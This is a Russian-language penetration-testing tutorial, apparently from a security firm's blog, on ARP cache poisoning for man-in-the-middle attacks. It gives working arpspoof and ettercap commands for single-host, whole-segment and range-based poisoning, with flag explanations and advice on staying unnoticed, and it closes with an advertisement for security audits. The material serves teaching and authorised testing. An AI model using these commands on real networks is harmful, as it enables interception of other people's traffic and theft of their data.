Изменение ARP таблиц обычно лежит в основе многих MitM атак в локальной сети. Данная атака работает в пределах одного широковещательного сегмента сети, но позволяет перехватывать весь трафик между хостами, что в рмках тестирования на проникновение (Pentest) позволяет получить много полезной информации.
Про данный вид атак написано и так очень много, поэтому просто расскажу основные методики проведения данного типа атак.
Для проведения атаки отравления ARP кэша (ARP poisoning, ARP spoofing) нам потребуются Linux утилиты ettercap и arpspoof. Arpspoof входит в пакет dsniff.
Предположим, что шлюз имеет адрес 192.168.1.1, а атакуемая машина 192.168.1.101. Хотя вместо шлюза может быть любой интересующий нас хост, например сервер, который так же находится в этом же сегменте сети.
Для проведения точечной атаки между двумя конкретных хостами нам подойдет утилита arpspoof.
Запустим подмену ARP кэша:
arpspoof -i eth0 -t 192.168.1.101 -r 192.168.1.1
Использованные параметры:
-i eth0 это используемый интерфейс
-t 192.168.1.101 атакуемая машина, у которой будет подменена ARP запись
-r подменяем кэш у обоих машин, чтобы обратный трафик тоже шел через нас
192.168.1.1 второй хост, т с которым мы хотим чтобы была атака “Человек-по-середине”
Данный путь хорош, когда нужна точечная атака, а вот когда нужно сделать глобальную подмену в сегменте для все, то придется запустить такую команду для каждого хоста. Поэтому гораздо эффективнее использовать автоматизированную утилиту – Ettercap.
Запустим отравление ARP кэша на всю сеть:
ettercap -T -q -o -M ARP
Использованные параметры:
-T текстовый режим (наиболее стабилен в работе)
-q не отображать содержимое паектов
-o только MitM атака, не включать сниффер
-M arp указываем, что это будет атака ARP poisoning. Без дополнительных параметров означает, что это будут все доступные хосты в сети.
Но можно запустить и для отдельного хоста, подменив ему кэш со всеми остальными хостами в подсети (хотя этого без особой надобности делать не стоит, а стоит ориентироваться на нужные и интересные хосты, которые были найдены во время сканирования подсети скажем утилитой nbtscan. Узнаем NETBIOS имена в локальной сети. Иначе можно быть очень быстро замеченным):
ettercap -T -q -o -M ARP /192.168.1.1/ //
или между группами хостов:
ettercap -T -q -o -M ARP /192.168.1.1-10/ /192.168.1.20-55/
в данном случае произойдет подмена записей между диапазонами хостов 192.168.1.1-10 и 192.168.1.20-55.
Остальные сценарии использования можно посмотреть в man‘е.
Удачных тестов на проникновение!
Заказать Аудит Безопасности или Пентест Вашей IT-инфраструктурыБыть уверенным в своей IT-инфраструктуре – это быть уверенным в завтрашнем дне. Для того, чтобы сделать заказ:
|